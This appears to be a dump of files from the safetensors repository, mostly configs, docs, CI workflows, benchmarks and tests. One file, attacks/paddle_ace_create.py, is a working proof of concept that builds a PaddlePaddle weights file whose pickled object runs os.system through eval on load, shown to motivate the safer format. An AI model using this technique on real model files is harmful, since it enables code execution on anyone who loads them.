Should be enough to install this library locally. 53 | 54 | ### Testing 55 | 56 | ``` 57 | # inside ./safetensors/bindings/python 58 | pip install .[dev] 59 | pytest -sv tests/ 60 | ``` 61 | -------------------------------------------------------------------------------- /bindings/python/setup.cfg: -------------------------------------------------------------------------------- 1 | [isort] 2 | default_section = FIRSTPARTY 3 | ensure_newline_before_comments = True 4 | force_grid_wrap = 0 5 | include_trailing_comma = True 6 | known_first_party = transformers 7 | known_third_party = 8 | absl 9 | conllu 10 | datasets 11 | elasticsearch 12 | fairseq 13 | faiss-cpu 14 | fastprogress 15 | fire 16 | fugashi 17 | git 18 | h5py 19 | matplotlib 20 | nltk 21 | numpy 22 | packaging 23 | pandas 24 | PIL 25 | psutil 26 | pytest 27 | pytorch_lightning 28 | rouge_score 29 | sacrebleu 30 | seqeval 31 | sklearn 32 | streamlit 33 | tensorboardX 34 | tensorflow 35 | tensorflow_datasets 36 | timeout_decorator 37 | torch 38 | torchaudio 39 | torchtext 40 | torchvision 41 | torch_xla 42 | tqdm 43 | paddlepaddle 44 | 45 | line_length = 119 46 | lines_after_imports = 2 47 | multi_line_output = 3 48 | use_parentheses = True 49 | 50 | [flake8] 51 | ignore = E203, E501, E741, W503, W605 52 | max-line-length = 119 53 | 54 | [tool:pytest] 55 | doctest_optionflags=NUMBER NORMALIZE_WHITESPACE ELLIPSIS -------------------------------------------------------------------------------- /docs/source/convert-weights.md: -------------------------------------------------------------------------------- 1 | # Convert weights to safetensors 2 | 3 | PyTorch model weights are commonly saved and stored as `.bin` files with Python's [`pickle`](https://docs.python.org/3/library/pickle.html) utility. To save and store your model weights in the more secure `safetensor` format, we recommend converting your weights to `.safetensors`. 4 | 5 | The easiest way to convert your model weights is to use the [Convert Space](https://huggingface.co/spaces/safetensors/convert), given your model weights are already stored on the Hub. The Convert Space downloads the pickled weights, converts them, and opens a Pull Request to upload the newly converted `.safetensors` file to your repository. 6 | 7 | 8 | 9 | For larger models, the Space may be a bit slower because its resources are tied up in converting other models. You can also try running the [convert.py](https://github.com/huggingface/safetensors/blob/main/bindings/python/convert.py) script (this is what the Space is running) locally to convert your weights. 10 | 11 | Feel free to ping [@Narsil](https://huggingface.co/Narsil) for any issues with the Space. 12 | 13 | 14 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature-request.yml: -------------------------------------------------------------------------------- 1 | name: "\U0001F680 Feature request" 2 | description: Submit a proposal/request for a new safetensors feature 3 | labels: [ "feature" ] 4 | body: 5 | - type: textarea 6 | id: feature-request 7 | validations: 8 | required: true 9 | attributes: 10 | label: Feature request 11 | description: | 12 | A clear and concise description of the feature proposal. Please provide a link to the paper and code in case they exist. 13 | 14 | - type: textarea 15 | id: motivation 16 | validations: 17 | required: true 18 | attributes: 19 | label: Motivation 20 | description: | 21 | Please outline the motivation for the proposal. Is your feature request related to a problem? e.g., I'm always frustrated when [...]. If this is related to another GitHub issue, please link here too. 22 | 23 | 24 | - type: textarea 25 | id: contribution 26 | validations: 27 | required: true 28 | attributes: 29 | label: Your contribution 30 | description: | 31 | Is there any way that you could help, e.g. by submitting a PR? Make sure to read the CONTRIBUTING.MD [readme](https://github.com/huggingface/safetensors/blob/main/CONTRIBUTING.md) 32 | -------------------------------------------------------------------------------- /bindings/python/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: deps_table_update modified_only_fixup extra_style_checks quality style fixup fix-copies test test-examples 2 | 3 | # make sure to test the local checkout in scripts and not the pre-installed one (don't use quotes!) 4 | export PYTHONPATH = src 5 | 6 | check_dirs := tests py_src 7 | 8 | modified_only_fixup: 9 | $(eval modified_py_files := $(shell python utils/get_modified_files.py $(check_dirs))) 10 | @if test -n "$(modified_py_files)"; then \ 11 | echo "Checking/fixing $(modified_py_files)"; \ 12 | black --preview $(modified_py_files); \ 13 | isort $(modified_py_files); \ 14 | flake8 $(modified_py_files); \ 15 | else \ 16 | echo "No library .py files were modified"; \ 17 | fi 18 | 19 | 20 | quality: 21 | black --check --preview $(check_dirs) 22 | isort --check-only $(check_dirs) 23 | flake8 $(check_dirs) 24 | # doc-builder style src/transformers docs/source --max_len 119 --check_only --path_to_docs docs/source 25 | 26 | style: 27 | black --preview $(check_dirs) 28 | isort $(check_dirs) 29 | 30 | # Super fast fix and check target that only works on relevant modified files since the branch was made 31 | 32 | fixup: modified_only_fixup 33 | 34 | test: 35 | python -m pytest -n auto --dist=loadfile -s -v ./tests/ 36 | -------------------------------------------------------------------------------- /safetensors/src/lib.rs: -------------------------------------------------------------------------------- 1 | #![deny(missing_docs)] 2 | #![doc = include_str!("../README.md")] 3 | #![cfg_attr(not(feature = "std"), no_std)] 4 | pub mod slice; 5 | pub mod tensor; 6 | /// serialize_to_file only valid in std 7 | #[cfg(feature = "std")] 8 | pub use tensor::serialize_to_file; 9 | pub use tensor::{serialize, Dtype, SafeTensorError, SafeTensors, View}; 10 | 11 | #[cfg(not(feature = "std"))] 12 | #[macro_use] 13 | extern crate alloc; 14 | 15 | /// A facade around all the types we need from the `std`, `core`, and `alloc` 16 | /// crates. This avoids elaborate import wrangling having to happen in every 17 | /// module. 18 | mod lib { 19 | #[cfg(not(feature = "std"))] 20 | mod no_stds { 21 | pub use alloc::borrow::Cow; 22 | pub use alloc::string::{String, ToString}; 23 | pub use alloc::vec::Vec; 24 | pub use hashbrown::HashMap; 25 | } 26 | #[cfg(feature = "std")] 27 | mod stds { 28 | pub use std::borrow::Cow; 29 | pub use std::collections::HashMap; 30 | pub use std::string::{String, ToString}; 31 | pub use std::vec::Vec; 32 | } 33 | /// choose std or no_std to export by feature flag 34 | #[cfg(not(feature = "std"))] 35 | pub use no_stds::*; 36 | #[cfg(feature = "std")] 37 | pub use stds::*; 38 | } 39 | -------------------------------------------------------------------------------- /Dockerfile.s390x.test: -------------------------------------------------------------------------------- 1 | FROM s390x/python 2 | RUN wget https://repo.anaconda.com/miniconda/Miniconda3-py311_23.5.2-0-Linux-s390x.sh \ 3 | && bash Miniconda3-py311_23.5.2-0-Linux-s390x.sh -b \ 4 | && rm -f Miniconda3-py311_23.5.2-0-Linux-s390x.sh 5 | RUN curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | bash -s -- -y 6 | RUN /root/miniconda3/bin/conda install pytorch cpuonly -c pytorch -y 7 | WORKDIR /safetensors/ 8 | RUN /root/miniconda3/bin/pip install -U pip pytest 9 | # RUN /root/miniconda3/bin/pip install -U huggingface_hub 10 | # RUN /root/miniconda3/bin/python -c 'from huggingface_hub import hf_hub_download; filename = hf_hub_download("roberta-base", "model.safetensors")' 11 | COPY . . 12 | SHELL ["/bin/bash", "-c"] 13 | WORKDIR /safetensors/bindings/python/ 14 | RUN source /root/.cargo/env && /root/miniconda3/bin/pip install -e . 15 | # Work around error probably caused by https://sourceware.org/bugzilla/show_bug.cgi?id=32653 16 | # E ImportError: libopenblas.so.0: cannot enable executable stack as shared object requires: Invalid argument 17 | ENV GLIBC_TUNABLES=glibc.rtld.execstack=2 18 | RUN /root/miniconda3/bin/pytest -sv tests/test_pt_* tests/test_simple.py 19 | # RUN /root/miniconda3/bin/python -c 'from huggingface_hub import hf_hub_download; filename = hf_hub_download("roberta-base", "model.safetensors"); from safetensors.torch import load_file; weights = load_file(filename); assert weights["roberta.embeddings.position_embeddings.weight"][0][0].abs().item() > 1e-10' 20 | ENTRYPOINT /bin/bash 21 | -------------------------------------------------------------------------------- /.pre-commit-config.yaml: -------------------------------------------------------------------------------- 1 | repos: 2 | - repo: https://github.com/Narsil/pre-commit-rust 3 | rev: 0c016cee78144d06d906fccc7715d607a946ca5c 4 | hooks: 5 | - id: fmt 6 | name: "Rust (fmt)" 7 | args: ["--manifest-path", "safetensors/Cargo.toml", "--"] 8 | - id: clippy 9 | name: "Rust (clippy)" 10 | args: 11 | [ 12 | "--manifest-path", 13 | "safetensors/Cargo.toml", 14 | "--all-targets", 15 | "--", 16 | "-Dwarnings", 17 | ] 18 | - repo: https://github.com/Narsil/pre-commit-rust 19 | rev: 0c016cee78144d06d906fccc7715d607a946ca5c 20 | hooks: 21 | - id: fmt 22 | name: "Python (fmt)" 23 | args: ["--manifest-path", "bindings/python/Cargo.toml", "--"] 24 | - id: clippy 25 | name: "Python (clippy)" 26 | args: 27 | [ 28 | "--manifest-path", 29 | "bindings/python/Cargo.toml", 30 | "--all-targets", 31 | "--", 32 | "-Dwarnings", 33 | ] 34 | - repo: https://github.com/astral-sh/ruff-pre-commit 35 | # Ruff version. 36 | rev: v0.12.8 37 | hooks: 38 | # Run the linter. 39 | - id: ruff-check 40 | # Run the formatter. 41 | - id: ruff-format 42 | - repo: https://github.com/astral-sh/ruff-pre-commit 43 | # Ruff version. 44 | rev: v0.11.11 45 | hooks: 46 | # Run the linter. 47 | - id: ruff-check 48 | # Run the formatter. 49 | - id: ruff-format 50 | -------------------------------------------------------------------------------- /safetensors/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "safetensors" 3 | version = "0.7.0-dev.0" 4 | edition = "2021" 5 | rust-version = "1.80" 6 | homepage = "https://github.com/huggingface/safetensors" 7 | repository = "https://github.com/huggingface/safetensors" 8 | documentation = "https://docs.rs/safetensors/" 9 | license = "Apache-2.0" 10 | keywords = ["safetensors", "huggingface", "Tensors", "Pytorch", "Tensorflow"] 11 | readme = "./README.md" 12 | description = """ 13 | Provides functions to read and write safetensors which aim to be safer than 14 | their PyTorch counterpart. 15 | The format is 8 bytes which is an unsized int, being the size of a JSON header, 16 | the JSON header refers the `dtype` the `shape` and `data_offsets` which are the offsets 17 | for the values in the rest of the file. 18 | """ 19 | exclude = ["rust-toolchain", "target/*", "Cargo.lock"] 20 | 21 | 22 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 23 | 24 | [dependencies] 25 | serde = { version = "1.0", default-features = false, features = [ 26 | "derive", 27 | "alloc", 28 | ] } 29 | serde_json = { version = "1.0", default-features = false, features = ["alloc"] } 30 | hashbrown = { version = "0.16", features = ["serde"] } 31 | 32 | [target.'cfg(target_os = "macos")'.dependencies] 33 | libc = "0.2" 34 | 35 | [dev-dependencies] 36 | criterion = "0.6" 37 | memmap2 = "0.9" 38 | proptest = "1.7" 39 | 40 | [features] 41 | default = ["std"] 42 | std = ["serde/default", "serde_json/default"] 43 | # Kept for backward compatibility - no-op since alloc is always available 44 | alloc = [] 45 | 46 | [[bench]] 47 | name = "benchmark" 48 | harness = false 49 | -------------------------------------------------------------------------------- /bindings/python/convert_all.py: -------------------------------------------------------------------------------- 1 | """Simple utility tool to convert automatically most downloaded models""" 2 | 3 | from convert import AlreadyExists, convert 4 | from huggingface_hub import HfApi, ModelFilter, ModelSearchArguments 5 | from transformers import AutoConfig 6 | 7 | 8 | if __name__ == "__main__": 9 | api = HfApi() 10 | args = ModelSearchArguments() 11 | 12 | total = 50 13 | models = list( 14 | api.list_models( 15 | filter=ModelFilter(library=args.library.Transformers), 16 | sort="downloads", 17 | direction=-1, 18 | ) 19 | )[:total] 20 | 21 | correct = 0 22 | errors = set() 23 | for model in models: 24 | model = api.model_info(model.id, files_metadata=True) 25 | size = None 26 | for sibling in model.siblings: 27 | if sibling.rfilename == "pytorch_model.bin": 28 | size = sibling.size 29 | if size is None or size > 2_000_000_000: 30 | print(f"[{model.downloads}] Skipping {model.modelId} (too large {size})") 31 | continue 32 | 33 | model_id = model.modelId 34 | print(f"[{model.downloads}] {model.modelId}") 35 | try: 36 | convert(api, model_id) 37 | correct += 1 38 | except AlreadyExists as e: 39 | correct += 1 40 | print(e) 41 | except Exception as e: 42 | config = AutoConfig.from_pretrained(model_id) 43 | errors.add(config.__class__.__name__) 44 | print(e) 45 | 46 | print(f"Errors: {errors}") 47 | print(f"File size is difference {len(errors)}") 48 | print(f"Correct rate {correct}/{total} ({correct / total * 100:.2f}%)") 49 | -------------------------------------------------------------------------------- /attacks/paddle_ace_create.py: -------------------------------------------------------------------------------- 1 | import paddle 2 | import numpy as np 3 | from collections import Iterable, OrderedDict 4 | 5 | def _parse_every_object(obj, condition_func, convert_func): 6 | if condition_func(obj): 7 | return convert_func(obj) 8 | elif isinstance(obj, (dict, OrderedDict, list)): 9 | if isinstance(obj, list): 10 | keys = range(len(obj)) 11 | else: 12 | keys = list(obj.keys()) 13 | for key in keys: 14 | if condition_func(obj[key]): 15 | obj[key] = convert_func(obj[key]) 16 | else: 17 | obj[key] = _parse_every_object( 18 | obj[key], condition_func, convert_func 19 | ) 20 | return obj 21 | elif isinstance(obj, tuple): 22 | return tuple( 23 | _parse_every_object(list(obj), condition_func, convert_func) 24 | ) 25 | elif isinstance(obj, set): 26 | object(list(obj), condition_func, convert_func) 27 | else: 28 | return obj 29 | 30 | # hack _parse_every_object method 31 | paddle.framework.io._parse_every_object = _parse_every_object 32 | 33 | class BadDict(dict): 34 | def __init__(self, src: str, **kwargs): 35 | super().__init__(**kwargs) 36 | self.src = src 37 | 38 | def __reduce__(self): 39 | return ( 40 | eval, 41 | (f"os.system('{self.src}') or dict()",), 42 | None, 43 | None, 44 | iter(self.items()), 45 | ) 46 | 47 | paddle.save( 48 | [BadDict( 49 | 'echo "pwned your computer, I can do anything I want."', 50 | **{"weight": paddle.zeros((2, 2))}, 51 | )], 52 | "paddle_ace.pdparams", 53 | ) 54 | -------------------------------------------------------------------------------- /docs/safetensors.schema.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://json-schema.org/draft/2020-12/schema", 3 | "title": "safetensors format header", 4 | "description": "Describes the structure of all the tensors and their metadata", 5 | "$defs": { 6 | "size_t": { 7 | "type": "integer", 8 | "minimum": 0, 9 | "maximum": 281474976710655, 10 | "description": "A natural integer no more than 48 bits (current CPU limitation, not all 64 bits are used)" 11 | }, 12 | "Tensor": { 13 | "title": "Tensor", 14 | "description": "Describes the structure of one tensor", 15 | "type": "object", 16 | "additionalProperties": false, 17 | "properties": { 18 | "dtype": { 19 | "type": "string", 20 | "pattern": "([UIF])(8|16|32|64|128|256)", 21 | "description": "Type of the array. U - unsigned int, I - signed int, F - IEEE 754 floating-point. Number is the count of bits." 22 | }, 23 | "shape": { 24 | "type": "array", 25 | "items": { 26 | "$ref": "#/$defs/size_t", 27 | "description": "Size of each dimension." 28 | } 29 | }, 30 | "data_offsets": { 31 | "type": "array", 32 | "prefixItems": [ 33 | { 34 | "$ref": "#/$defs/size_t", 35 | "description": "Start offset of the array. " 36 | }, 37 | { 38 | "$ref": "#/$defs/size_t", 39 | "description": "End offset of the array. Equal to the previous item + array size." 40 | } 41 | ] 42 | } 43 | }, 44 | "required": [ 45 | "data_offsets", 46 | "dtype", 47 | "shape" 48 | ] 49 | }, 50 | "Metadata": { 51 | "type": "object", 52 | "additionalProperties": {"type": "string"}, 53 | "title": "Metadata" 54 | } 55 | }, 56 | "type": "object", 57 | "properties": { 58 | "__metadata__": { 59 | "description": "Arbitrary metadata", 60 | "$ref": "#/$defs/Metadata" 61 | } 62 | }, 63 | "additionalProperties": { 64 | "$ref": "#/$defs/Tensor" 65 | } 66 | } 67 | -------------------------------------------------------------------------------- /.github/workflows/rust.yml: -------------------------------------------------------------------------------- 1 | name: Rust 2 | 3 | on: 4 | pull_request: 5 | 6 | jobs: 7 | build: 8 | runs-on: ${{ matrix.os }} 9 | strategy: 10 | matrix: 11 | os: [ubuntu-latest, windows-latest, macOS-latest] 12 | toolchain: [stable] 13 | include: 14 | - os: ubuntu-latest 15 | toolchain: "1.74" 16 | defaults: 17 | run: 18 | working-directory: ./safetensors 19 | 20 | steps: 21 | - uses: actions/checkout@v6 22 | 23 | - name: Install Rust Stable 24 | uses: dtolnay/rust-toolchain@stable 25 | with: 26 | components: rustfmt, clippy, llvm-tools-preview 27 | override: true 28 | 29 | - uses: Swatinem/rust-cache@v2 30 | 31 | - name: Install cargo-audit 32 | run: cargo install cargo-audit 33 | 34 | - name: Install cargo-llvm-cov for Ubuntu 35 | if: matrix.os == 'ubuntu-latest' 36 | run: cargo install cargo-llvm-cov 37 | 38 | - name: Build 39 | run: cargo build --all-targets --verbose 40 | 41 | - name: Lint with Clippy 42 | run: cargo clippy --all-targets -- -D warnings 43 | 44 | - name: Run Tests 45 | run: cargo test --verbose 46 | 47 | - name: Run No-STD Tests 48 | run: cargo test --no-default-features --verbose 49 | 50 | - name: Run Audit 51 | # RUSTSEC-2021-0145 is criterion so only within benchmarks 52 | run: cargo audit -D warnings --ignore RUSTSEC-2021-0145 53 | 54 | - name: Coverage report 55 | if: matrix.os == 'ubuntu-latest' 56 | run: cargo llvm-cov --release --lcov --output-path lcov.info 57 | 58 | # - name: Upload to codecov.io 59 | # if: matrix.os == 'ubuntu-latest' 60 | # uses: codecov/codecov-action@v3 61 | # with: 62 | # token: ${{ secrets.CODECOV_TOKEN }} # not required for public repos 63 | # working-directory: ./safetensors 64 | # fail_ci_if_error: true 65 | -------------------------------------------------------------------------------- /safetensors/benches/benchmark.rs: -------------------------------------------------------------------------------- 1 | use criterion::{criterion_group, criterion_main, Criterion}; 2 | use safetensors::tensor::*; 3 | use std::collections::HashMap; 4 | use std::hint::black_box; 5 | 6 | // Returns a sample data of size 2_MB 7 | fn get_sample_data() -> (Vec, Vec, Dtype) { 8 | let shape = vec![1000, 500]; 9 | let dtype = Dtype::F32; 10 | let nbits = shape.iter().product::() * dtype.bitsize(); 11 | assert!(nbits % 8 == 0); 12 | let n: usize = nbits / 8; // 4 13 | let data = vec![0; n]; 14 | 15 | (data, shape, dtype) 16 | } 17 | 18 | pub fn bench_serialize(c: &mut Criterion) { 19 | let (data, shape, dtype) = get_sample_data(); 20 | let n_layers = 5; 21 | 22 | let mut metadata: HashMap = HashMap::new(); 23 | // 2_MB x 5 = 10_MB 24 | for i in 0..n_layers { 25 | let tensor = TensorView::new(dtype, shape.clone(), &data[..]).unwrap(); 26 | metadata.insert(format!("weight{i}"), tensor); 27 | } 28 | 29 | c.bench_function("Serialize 10_MB", |b| { 30 | b.iter(|| { 31 | let _serialized = serialize(black_box(&metadata), black_box(None)); 32 | }) 33 | }); 34 | } 35 | 36 | pub fn bench_deserialize(c: &mut Criterion) { 37 | let (data, shape, dtype) = get_sample_data(); 38 | let n_layers = 5; 39 | 40 | let mut metadata: HashMap = HashMap::new(); 41 | // 2_MB x 5 = 10_MB 42 | for i in 0..n_layers { 43 | let tensor = TensorView::new(dtype, shape.clone(), &data[..]).unwrap(); 44 | metadata.insert(format!("weight{i}"), tensor); 45 | } 46 | 47 | let out = serialize(&metadata, None).unwrap(); 48 | 49 | c.bench_function("Deserialize 10_MB", |b| { 50 | b.iter(|| { 51 | let _deserialized = SafeTensors::deserialize(black_box(&out)).unwrap(); 52 | }) 53 | }); 54 | } 55 | 56 | criterion_group!(bench_ser, bench_serialize); 57 | criterion_group!(bench_de, bench_deserialize); 58 | criterion_main!(bench_ser, bench_de); 59 | -------------------------------------------------------------------------------- /.github/workflows/python-bench.yml: -------------------------------------------------------------------------------- 1 | name: Simple benchmarks 2 | on: 3 | push: 4 | branches: 5 | - main 6 | pull_request: 7 | 8 | 9 | permissions: 10 | # deployments permission to deploy GitHub pages website 11 | deployments: write 12 | # contents permission to update benchmark contents in gh-pages branch 13 | contents: write 14 | 15 | jobs: 16 | benchmark: 17 | name: Performance regression check 18 | runs-on: ubuntu-latest 19 | steps: 20 | - uses: actions/checkout@v6 21 | - name: Install Rust 22 | uses: dtolnay/rust-toolchain@stable 23 | with: 24 | components: rustfmt, clippy 25 | 26 | - name: Install Python 27 | uses: actions/setup-python@v6 28 | with: 29 | python-version: "3.12" 30 | architecture: "x64" 31 | 32 | - name: Install 33 | working-directory: ./bindings/python 34 | run: | 35 | pip install -U pip uv 36 | uv sync --extra dev 37 | 38 | - name: Run tests 39 | working-directory: ./bindings/python 40 | run: | 41 | cargo test 42 | uv run pytest --benchmark-json output.json benches/ 43 | # Download previous benchmark result from cache (if exists) 44 | - name: Download previous benchmark data 45 | uses: actions/cache@v5 46 | with: 47 | path: ./cache 48 | key: ${{ runner.os }}-benchmark 49 | # Run `github-action-benchmark` action 50 | - name: Store benchmark result 51 | uses: benchmark-action/github-action-benchmark@v1 52 | with: 53 | # What benchmark tool the output.txt came from 54 | tool: 'pytest' 55 | # Where the output from the benchmark tool is stored 56 | output-file-path: ./bindings/python/output.json 57 | github-token: ${{ secrets.GITHUB_TOKEN }} 58 | # Push and deploy GitHub pages branch automatically 59 | auto-push: ${{ github.event.pull_request.head.repo.fork == false }} 60 | comment-on-alert: true 61 | # Mention @rhysd in the commit comment 62 | alert-comment-cc-users: '@danieldk,@McPatate' 63 | -------------------------------------------------------------------------------- /bindings/python/benches/test_paddle.py: -------------------------------------------------------------------------------- 1 | import os 2 | import tempfile 3 | 4 | import numpy as np 5 | 6 | import paddle 7 | from safetensors.paddle import load_file, save_file 8 | 9 | 10 | def create_gpt2(n_layers: int): 11 | tensors = {} 12 | tensors["wte"] = paddle.zeros((50257, 768)) 13 | tensors["wpe"] = paddle.zeros((1024, 768)) 14 | for i in range(n_layers): 15 | tensors[f"h.{i}.ln_1.weight"] = paddle.zeros((768,)) 16 | tensors[f"h.{i}.ln_1.bias"] = paddle.zeros((768,)) 17 | tensors[f"h.{i}.attn.bias"] = paddle.zeros((1, 1, 1024, 1024)) 18 | tensors[f"h.{i}.attn.c_attn.weight"] = paddle.zeros((768, 2304)) 19 | tensors[f"h.{i}.attn.c_attn.bias"] = paddle.zeros((2304,)) 20 | tensors[f"h.{i}.attn.c_proj.weight"] = paddle.zeros((768, 768)) 21 | tensors[f"h.{i}.attn.c_proj.bias"] = paddle.zeros((768,)) 22 | tensors[f"h.{i}.ln_2.weight"] = paddle.zeros((768,)) 23 | tensors[f"h.{i}.ln_2.bias"] = paddle.zeros((768,)) 24 | tensors[f"h.{i}.mlp.c_fc.weight"] = paddle.zeros((768, 3072)) 25 | tensors[f"h.{i}.mlp.c_fc.bias"] = paddle.zeros((3072,)) 26 | tensors[f"h.{i}.mlp.c_proj.weight"] = paddle.zeros((3072, 768)) 27 | tensors[f"h.{i}.mlp.c_proj.bias"] = paddle.zeros((768,)) 28 | tensors["ln_f.weight"] = paddle.zeros((768,)) 29 | tensors["ln_f.bias"] = paddle.zeros((768,)) 30 | return tensors 31 | 32 | 33 | def test_paddle_paddle_load(benchmark): 34 | # benchmark something 35 | weights = create_gpt2(12) 36 | with tempfile.NamedTemporaryFile(delete=False) as f: 37 | paddle.save(weights, f.name) 38 | result = benchmark(paddle.load, f.name) 39 | os.unlink(f.name) 40 | 41 | for k, v in weights.items(): 42 | tv = result[k] 43 | assert paddle.allclose(v, tv) 44 | 45 | 46 | def test_paddle_sf_load(benchmark): 47 | # benchmark something 48 | weights = create_gpt2(12) 49 | with tempfile.NamedTemporaryFile(delete=False) as f: 50 | save_file(weights, f.name) 51 | result = benchmark(load_file, f.name) 52 | os.unlink(f.name) 53 | 54 | for k, v in weights.items(): 55 | tv = result[k] 56 | assert np.allclose(v, tv) 57 | -------------------------------------------------------------------------------- /bindings/python/benches/test_flax.py: -------------------------------------------------------------------------------- 1 | import os 2 | import tempfile 3 | 4 | import jax.numpy as jnp 5 | from flax.serialization import msgpack_restore, msgpack_serialize 6 | from safetensors.flax import load_file, save_file 7 | 8 | 9 | def create_gpt2(n_layers: int): 10 | tensors = {} 11 | tensors["wte"] = jnp.zeros((50257, 768)) 12 | tensors["wpe"] = jnp.zeros((1024, 768)) 13 | for i in range(n_layers): 14 | tensors[f"h.{i}.ln_1.weight"] = jnp.zeros((768,)) 15 | tensors[f"h.{i}.ln_1.bias"] = jnp.zeros((768,)) 16 | tensors[f"h.{i}.attn.bias"] = jnp.zeros((1, 1, 1024, 1024)) 17 | tensors[f"h.{i}.attn.c_attn.weight"] = jnp.zeros((768, 2304)) 18 | tensors[f"h.{i}.attn.c_attn.bias"] = jnp.zeros((2304)) 19 | tensors[f"h.{i}.attn.c_proj.weight"] = jnp.zeros((768, 768)) 20 | tensors[f"h.{i}.attn.c_proj.bias"] = jnp.zeros((768)) 21 | tensors[f"h.{i}.ln_2.weight"] = jnp.zeros((768)) 22 | tensors[f"h.{i}.ln_2.bias"] = jnp.zeros((768)) 23 | tensors[f"h.{i}.mlp.c_fc.weight"] = jnp.zeros((768, 3072)) 24 | tensors[f"h.{i}.mlp.c_fc.bias"] = jnp.zeros((3072)) 25 | tensors[f"h.{i}.mlp.c_proj.weight"] = jnp.zeros((3072, 768)) 26 | tensors[f"h.{i}.mlp.c_proj.bias"] = jnp.zeros((768)) 27 | tensors["ln_f.weight"] = jnp.zeros((768)) 28 | tensors["ln_f.bias"] = jnp.zeros((768)) 29 | return tensors 30 | 31 | 32 | def load(filename): 33 | with open(filename, "rb") as f: 34 | data = f.read() 35 | flax_weights = msgpack_restore(data) 36 | return flax_weights 37 | 38 | 39 | def test_flax_flax_load(benchmark): 40 | # benchmark something 41 | weights = create_gpt2(12) 42 | with tempfile.NamedTemporaryFile(delete=False) as f: 43 | serialized = msgpack_serialize(weights) 44 | f.write(serialized) 45 | result = benchmark(load, f.name) 46 | os.unlink(f.name) 47 | 48 | for k, v in weights.items(): 49 | tv = result[k] 50 | assert jnp.allclose(v, tv) 51 | 52 | 53 | def test_flax_sf_load(benchmark): 54 | # benchmark something 55 | weights = create_gpt2(12) 56 | with tempfile.NamedTemporaryFile(delete=False) as f: 57 | save_file(weights, f.name) 58 | result = benchmark(load_file, f.name) 59 | os.unlink(f.name) 60 | 61 | for k, v in weights.items(): 62 | tv = result[k] 63 | assert jnp.allclose(v, tv) 64 | -------------------------------------------------------------------------------- /bindings/python/benches/test_mlx.py: -------------------------------------------------------------------------------- 1 | import os 2 | import platform 3 | import tempfile 4 | 5 | 6 | if platform.system() == "Darwin": 7 | import mlx.core as mx 8 | from safetensors.mlx import load_file, save_file 9 | 10 | def create_gpt2(n_layers: int): 11 | tensors = {} 12 | tensors["wte"] = mx.zeros((50257, 768)) 13 | tensors["wpe"] = mx.zeros((1024, 768)) 14 | for i in range(n_layers): 15 | tensors[f"h.{i}.ln_1.weight"] = mx.zeros((768,)) 16 | tensors[f"h.{i}.ln_1.bias"] = mx.zeros((768,)) 17 | tensors[f"h.{i}.attn.bias"] = mx.zeros((1, 1, 1024, 1024)) 18 | tensors[f"h.{i}.attn.c_attn.weight"] = mx.zeros((768, 2304)) 19 | tensors[f"h.{i}.attn.c_attn.bias"] = mx.zeros((2304)) 20 | tensors[f"h.{i}.attn.c_proj.weight"] = mx.zeros((768, 768)) 21 | tensors[f"h.{i}.attn.c_proj.bias"] = mx.zeros((768)) 22 | tensors[f"h.{i}.ln_2.weight"] = mx.zeros((768)) 23 | tensors[f"h.{i}.ln_2.bias"] = mx.zeros((768)) 24 | tensors[f"h.{i}.mlp.c_fc.weight"] = mx.zeros((768, 3072)) 25 | tensors[f"h.{i}.mlp.c_fc.bias"] = mx.zeros((3072)) 26 | tensors[f"h.{i}.mlp.c_proj.weight"] = mx.zeros((3072, 768)) 27 | tensors[f"h.{i}.mlp.c_proj.bias"] = mx.zeros((768)) 28 | tensors["ln_f.weight"] = mx.zeros((768)) 29 | tensors["ln_f.bias"] = mx.zeros((768)) 30 | return tensors 31 | 32 | def load(filename): 33 | return mx.load(filename) 34 | 35 | def test_mlx_mlx_load(benchmark): 36 | # benchmark something 37 | weights = create_gpt2(12) 38 | with tempfile.NamedTemporaryFile(delete=False) as f: 39 | filename = f"{f.name}.npz" 40 | mx.savez(filename, **weights) 41 | result = benchmark(load, filename) 42 | os.unlink(f.name) 43 | 44 | for k, v in weights.items(): 45 | tv = result[k] 46 | assert mx.allclose(v, tv) 47 | 48 | def test_mlx_sf_load(benchmark): 49 | # benchmark something 50 | weights = create_gpt2(12) 51 | with tempfile.NamedTemporaryFile(delete=False) as f: 52 | save_file(weights, f.name) 53 | result = benchmark(load_file, f.name) 54 | os.unlink(f.name) 55 | 56 | for k, v in weights.items(): 57 | tv = result[k] 58 | assert mx.allclose(v, tv) 59 | -------------------------------------------------------------------------------- /bindings/python/tests/test_handle.py: -------------------------------------------------------------------------------- 1 | import unittest 2 | 3 | import numpy as np 4 | 5 | from safetensors import _safe_open_handle 6 | from safetensors.numpy import save_file, save 7 | 8 | 9 | class ReadmeTestCase(unittest.TestCase): 10 | def assertTensorEqual(self, tensors1, tensors2, equality_fn): 11 | self.assertEqual(tensors1.keys(), tensors2.keys(), "tensor keys don't match") 12 | 13 | for k, v1 in tensors1.items(): 14 | v2 = tensors2[k] 15 | 16 | self.assertTrue(equality_fn(v1, v2), f"{k} tensors are different") 17 | 18 | def test_numpy_example(self): 19 | tensors = {"a": np.zeros((2, 2)), "b": np.zeros((2, 3), dtype=np.uint8)} 20 | 21 | save_file(tensors, "./out_np.safetensors") 22 | 23 | # Now loading 24 | loaded = {} 25 | with open("./out_np.safetensors", "r") as f: 26 | with _safe_open_handle(f, framework="np", device="cpu") as g: 27 | for key in g.keys(): 28 | loaded[key] = g.get_tensor(key) 29 | self.assertTensorEqual(tensors, loaded, np.allclose) 30 | 31 | def test_fsspec(self): 32 | import fsspec 33 | 34 | tensors = {"a": np.zeros((2, 2)), "b": np.zeros((2, 3), dtype=np.uint8)} 35 | 36 | fs = fsspec.filesystem("file") 37 | byts = save(tensors) 38 | with fs.open("fs.safetensors", "wb") as f: 39 | f.write(byts) 40 | # Now loading 41 | loaded = {} 42 | with fs.open("fs.safetensors", "rb") as f: 43 | with _safe_open_handle(f, framework="np", device="cpu") as g: 44 | for key in g.keys(): 45 | loaded[key] = g.get_tensor(key) 46 | self.assertTensorEqual(tensors, loaded, np.allclose) 47 | 48 | @unittest.skip("Will not work without s3 access") 49 | def test_fsspec_s3(self): 50 | import s3fs 51 | 52 | tensors = {"a": np.zeros((2, 2)), "b": np.zeros((2, 3), dtype=np.uint8)} 53 | 